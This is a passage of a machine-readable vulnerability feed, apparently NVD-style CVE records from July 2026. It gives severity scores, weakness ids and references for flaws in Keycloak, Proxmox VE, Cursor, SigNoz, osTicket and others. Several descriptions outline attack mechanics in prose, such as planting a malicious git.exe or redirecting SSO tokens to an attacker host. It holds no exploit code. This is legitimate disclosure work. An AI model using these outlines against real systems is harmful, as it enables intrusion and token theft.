vssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","baseScore":6.4,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:25:25.663244Z","id":"CVE-2026-12705","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cybersecurity@ch.abb.com","type":"Secondary","description":[{"lang":"en","value":"CWE-353"}]}],"references":[{"url":"https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A9270&LanguageCode=en&DocumentPartId=pdf&Action=Launch","source":"cybersecurity@ch.abb.com"}]}},{"cve":{"id":"CVE-2026-16017","sourceIdentifier":"cna@vuldb.com","published":"2026-07-17T15:16:46.157","lastModified":"2026-07-17T18:17:14.737","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A security flaw has been discovered in mosaxiv clawlet up to 0.2.10. Impacted is the function list/remove of the file tools/tool_cron.go of the component cron Chat Tool. The manipulation results in missing authorization. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The reported GitHub issue was closed with the label \"not planned\"."}],"affected":[{"source":"cna@vuldb.com","affectedData":[{"vendor":"mosaxiv","product":"clawlet","cpes":["cpe:2.3:a:mosaxiv:clawlet:*:*:*:*:*:*:*:*"],"modules":["cron Chat Tool"],"versions":[{"version":"0.2.0","status":"affected"},{"version":"0.2.1","status":"affected"},{"version":"0.2.2","status":"affected"},{"version":"0.2.3","status":"affected"},{"version":"0.2.4","status":"affected"},{"version":"0.2.5","status":"affected"},{"version":"0.2.6","status":"affected"},{"version":"0.2.7","status":"affected"},{"version":"0.2.8","status":"affected"},{"version":"0.2.9","status":"affected"},{"version":"0.2.10","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:P/I:P/A:P","baseScore":6.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:27:17.760419Z","id":"CVE-2026-16017","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"},{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/mosaxiv/clawlet/","source":"cna@vuldb.com"},{"url":"https://github.com/mosaxiv/clawlet/issues/17","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-16017","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/856824","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379759","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/379759/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-16089","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T15:16:46.317","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the keycloak-services component of Red Hat Build of Keycloak. The issue occurs because OAuth 2.0 authorization codes are not properly bound to the client that originally requested them. An attacker who can intercept an authorization code can modify it to be redeemed by their own client, potentially allowing them to obtain access tokens for a victim's identity."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":4.2}]},"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16089","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501724","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-51081","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T15:16:46.753","lastModified":"2026-07-17T18:29:27.757","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A cross-site scripting (XSS) vulnerability in Proxmox Virtual Environment (PVE) 9.x 5.1.8 and Proxmox Virtual Environment (PVE) 8.x 4.3.16 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:12:31.019464Z","id":"CVE-2026-51081","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/post-849973","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-51082","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T15:16:46.867","lastModified":"2026-07-17T18:28:39.220","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A race condition between the vncproxy and vncwebsocket API calls in Proxmox Virtual Environment (PVE) 9.x pve-manager before 9.1.9 and 8.x before 8.4.19; qemu-server 9.x before 9.1.7 and 8.x before 8.4.7; and pve-container before 6.1.3 (PVE 9.x) and before 5.3.4 (PVE 8.x) allows an attacker with privileges to call \"vncproxy\" to hijack a VNC session that is established in parallel by a different user for a different VM."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:44:15.514638Z","id":"CVE-2026-51082","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-362"}]}],"references":[{"url":"https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/post-849971","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-51083","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T15:16:46.973","lastModified":"2026-07-17T18:29:27.757","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Incorrect access control in Proxmox Virtual Environment (PVE) 9.x qemu-server before 9.1.8 and 8.x before 8.4.8 allows users within limited privileges to obtain hashed passwords via the cloudinit/dump API."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:26:09.925292Z","id":"CVE-2026-51083","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]}],"references":[{"url":"https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/page-2#post-84997","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-63093","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T15:16:47.817","lastModified":"2026-07-17T18:28:53.707","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Cursor for Windows version 3.2.16 contains a binary planting vulnerability that allows remote attackers to achieve arbitrary code execution by placing a malicious git.exe file in the repository root directory. When a developer clones and opens a crafted repository, Cursor automatically resolves and executes the workspace-resident git.exe during IDE startup and on a recurring timed cadence without any user interaction, running the malicious binary under the privileges of the current user."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"Anysphere, Inc.","product":"Cursor","defaultStatus":"affected","platforms":["Windows"],"versions":[{"version":"3.2.16","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:08:48.268327Z","id":"CVE-2026-63093","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-426"}]}],"references":[{"url":"https://cursor.com/","source":"disclosure@vulncheck.com"},{"url":"https://mindgard.ai/blog/cursor-0day-when-full-disclosure-becomes-the-only-protection-left","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/cursor-for-windows-rce-via-malicious-git-exe-in-workspace","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63094","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T15:16:47.960","lastModified":"2026-07-17T18:28:39.220","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"SigNoz through 0.133.0 contains an open redirect vulnerability in the SSO authentication flow that allows unauthenticated attackers to steal session tokens from any user on instances configured with Google OAuth, SAML, or OIDC. Attackers can call the unauthenticated sessions context endpoint with a ref parameter pointing to an attacker-controlled host, deliver the resulting crafted login URL to a victim, and receive the victim's access and refresh tokens when they complete SSO authentication."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"SigNoz","product":"signoz","defaultStatus":"affected","repo":"https://github.com/SigNoz/signoz","versions":[{"version":"0","lessThanOrEqual":"0.133.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-345"},{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://github.com/SigNoz/signoz/issues/11746","source":"disclosure@vulncheck.com"},{"url":"https://github.com/SigNoz/signoz/pull/11844","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/signoz-sso-oauth-state-manipulation-session-token-theft","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-12715","sourceIdentifier":"f45cbf4e-4146-4068-b7e1-655ffc2c548c","published":"2026-07-17T16:17:13.047","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Missing Authorization in Google Cloud Firebase Studio versions prior to 2026-04-15 on Google Cloud Platform allows an attacker to download other users' deployed source code and access sensitive data via unauthorized GCS URL signing requests.\n\n\nThis vulnerability was patched on 15 April 2026, and no customer action is needed."}],"affected":[{"source":"f45cbf4e-4146-4068-b7e1-655ffc2c548c","affectedData":[{"vendor":"Google Cloud","product":"Firebase Studio","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"2026-04-15","versionType":"date","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"f45cbf4e-4146-4068-b7e1-655ffc2c548c","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear","baseScore":8.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"CLEAR"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:28:39.995725Z","id":"CVE-2026-12715","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"f45cbf4e-4146-4068-b7e1-655ffc2c548c","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://docs.cloud.google.com/support/bulletins#gcp-2026-043","source":"f45cbf4e-4146-4068-b7e1-655ffc2c548c"}]}},{"cve":{"id":"CVE-2026-14741","sourceIdentifier":"9b29abf9-4ab0-4765-b253-1875cd9b441e","published":"2026-07-17T16:17:13.443","lastModified":"2026-07-17T18:17:14.443","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HTTP::Date versions before 6.08 for Perl allow CPU exhaustion via polynomial regex backtracking in parse_date.\n\nparse_date() matches the date string against a chain of alternative regexes, and str2time() delegates to it. Several of these patterns place unbounded quantifiers next to each other before a trailing `\\s*$` anchor. A valid date prefix followed by a long interior run of digits, letters, or whitespace and a single trailing byte that defeats the final match forces the engine to repartition the run, giving polynomial (about quadratic) backtracking. A header value of a few tens of kilobytes runs for tens of seconds of CPU.\n\nHTTP::Date parses timestamps such as HTTP `Date`, `Expires`, and `Last-Modified` headers, which commonly originate from untrusted sources. Any caller that passes an untrusted date header to str2time() or parse_date() can be driven to consume unbounded CPU, a denial of service."}],"affected":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","affectedData":[{"vendor":"OALDERS","product":"HTTP::Date","defaultStatus":"unaffected","collectionURL":"https://cpan.org/modules","packageName":"HTTP-Date","programFiles":["lib/HTTP/Date.pm"],"programRoutines":[{"name":"HTTP::Date::parse_date"},{"name":"HTTP::Date::str2time"}],"repo":"https://github.com/libwww-perl/HTTP-Date","versions":[{"version":"0","lessThan":"6.08","versionType":"custom","status":"affected"}]}]}],"metrics":{"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:21:02.806513Z","id":"CVE-2026-14741","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","type":"Secondary","description":[{"lang":"en","value":"CWE-1333"}]}],"references":[{"url":"https://github.com/libwww-perl/HTTP-Date/commit/78c20952cdfbf11e03cf1199ad70f13298a84c5c.patch","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://github.com/libwww-perl/HTTP-Date/pull/33","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://metacpan.org/release/OALDERS/HTTP-Date-6.08/changes","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"http://www.openwall.com/lists/oss-security/2026/07/17/10","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-14871","sourceIdentifier":"help@fluidattacks.com","published":"2026-07-17T16:17:13.580","lastModified":"2026-07-17T18:10:00.977","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"osTicket versions v1.18.3 and v1.17.7 contain a Broken Object Level Authorization (BOLA) leading to Insecure Direct Object Reference (IDOR) in the AJAX ticket-management subsystem."}],"affected":[{"source":"help@fluidattacks.com","affectedData":[{"vendor":"osTicket","product":"osTicket","defaultStatus":"unaffected","platforms":["Windows","MacOS","Linux"],"versions":[{"version":"v1.18.3","status":"affected"},{"version":"v1.17.7","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"help@fluidattacks.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:28:10.925112Z","id":"CVE-2026-14871","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA 